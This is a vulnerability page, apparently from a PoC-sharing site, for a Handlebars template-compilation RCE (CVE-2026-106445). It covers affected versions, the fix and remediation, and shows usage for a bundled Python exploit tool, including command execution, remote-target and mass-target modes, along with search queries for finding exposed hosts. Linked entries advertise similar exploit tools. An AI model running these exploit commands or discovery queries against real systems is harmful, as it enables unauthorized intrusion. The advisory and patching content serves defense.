CVE-2026-106445 — Handlebars 4.0.0–4.7.9 RCE (Function.prototype.constructor Bypass)
October 10, 2026 · 37 views
handlebars 4.0.0–4.7.9: lookupProperty own-property order bypasses proto deny list → Function.prototype.constructor → sandbox escape when allowProtoMethodsByDefault:true and attacker-controlled compile (CWE-184/CWE-1289). CVSS 4.0 9.2 Critical AT:P. Fixed 4.7.10 GHSA-p8wg-vrv2-v86f. Python PoC: check/exploit, Docker lab, --render-path. Marker POCBIT-106445-OK.
Description
Overview
CVE-2026-106445 — Handlebars.js (handlebars) — remote code execution via Function.prototype.constructor own-property bypass when templates are compiled with allowProtoMethodsByDefault: true (CWE-184 / CWE-1289).
| | | |---|---| | Affected | 4.0.0 – 4.7.9 | | Fixed | 4.7.10 (GHSA-p8wg-vrv2-v86f) | | CVSS 4.0 | 9.2 Critical — AT:P (unsafe compile options + user template) | | Verify marker | POCBIT-106445-OK |
lookupProperty returns own properties before the proto deny list runs. On Function.prototype, constructor is own → resolves to Function. Attacker template + context function fn → Function(attackerCode)() via #each / apply.
Not every npm dependency install: the app must compile/render attacker-controlled templates with allowProtoMethodsByDefault: true (default in some hbs setups) and expose a function in the render context.
PoC page: https://pocbit.org/pocs/cve-2026-106445
GitHub: murrez/CVE-2026-106445
CVE.org: CVE-2026-106445
Bundled tool (Python 3)
Download cve-2026-106445.py — writes poc.py, requirements.txt, docker-compose.yml.
python cve-2026-106445.py
pip install -r requirements.txt
docker compose up --build -d # lab on :13045 when lab/ tree present
python poc.py -u http://127.0.0.1:13045 --mode check
python poc.py -u http://127.0.0.1:13045 --mode exploit
python poc.py -u http://127.0.0.1:13045 --mode exploit -c "id"
python poc.py --mode payload -c "id"
python poc.py -u https://app.example --render-path /api/preview --mode exploit -c "id" --insecure
python poc.py --list targets.txt --mode exploit -j 10 --skip-check
Lab API (reference): GET /health, POST /render JSON {"template":"..."}, optional GET /render?template=... (**--use-get`).
Exploit sends the GHSA template chain; verify POCBIT-106445-OK (or command output) in JSON output.
Discovery hints (your assets only)
body="handlebars" && body="allowProtoMethodsByDefault"
body="/render" && body="template" && server="Node"
Confirm with --mode check on suspected preview/render APIs—not static handlebars.min.js pages.
Remediation
- Upgrade to [email protected]+.
- Disable
allowProtoMethodsByDefaultfor untrusted templates. - Never compile user-supplied Handlebars on server-side preview endpoints without sandbox hardening.
Legal and ethical use
Authorized security testing only.
References
Related PoCs
Same platform, vendor, or tags — explore more write-ups on Pocbit.
- Web appCVE-2026-100721critical
CVE-2026-100721 — vm2 NodeVM External Allowlist Bypass (Sandbox Escape)
Incorrect authorization (CWE-863) in vm2 npm before 3.12.2: NodeVM external allowlist and resolver path checks allow colliding package names (evil-left-pad) or prefix path tricks → host-context require and sandbox escape / host RCE when embedders run untrusted JS with require.external + custom resolve. CVSS 9.0/9.5 Critical. Python PoC: --lab (Node), check, remote exploit, mass -j.
- Web appCVE-2026-82531critical
CVE-2026-82531 — Smarty Template Cache Poisoning RCE (SmartyNocache / extends)
smarty-php/smarty <4.5.8 and 5.0.0–5.8.4: extends/inheritance + cache regen with null nocache_hash lets forged assign() data inject SmartyNocache markers into cache PHP → include() RCE. CWE-94, CVSS 4.0 9.2 Critical (AT:P). Fixed 4.5.8 / 5.8.5. Python PoC: check/exploit/payload, Docker lab 5.8.4, hits.txt & exploited.txt. Marker POCBIT-82531-OK.
- Web appCVE-2026-107806critical
CVE-2026-107806 — nginx-ui 2.3.8–2.4.x Authenticated RCE (Forged Backup Restore / TestConfigCmd)
0xJacky/nginx-ui >=2.3.8 <2.5.0: admin JWT can download backup, tamper app.ini TestConfigCmd in re-signed zip, POST /api/restore + /api/nginx/test → shell (CWE-94). CVSS 4.0 9.4 Critical PR:H. Not CVE-2026-42238. Fixed 2.5.0. Python PoC: check/exploit, batch url|JWT. Marker POCBIT-107806-OK.
- Web appCVE-2026-105844critical
CVE-2026-105844 — Payload CMS Import/Export Plugin Prototype Pollution → ACL Bypass
Payload CMS + @payloadcms/plugin-import-export ≥3.0.0 <3.88.0: POST /api/exports/export-preview fields __proto__.overrideAccess pollutes Object.prototype via getSelect() → overrideAccess on later REST ops, unauthenticated data leak (app-dependent RCE). CWE-1321, CVSS 4.0 9.3 Critical. Fixed 3.88.0 / 4.0.0-canary.27. Python PoC: check/exploit/mass -j, hits.txt & exploited.txt.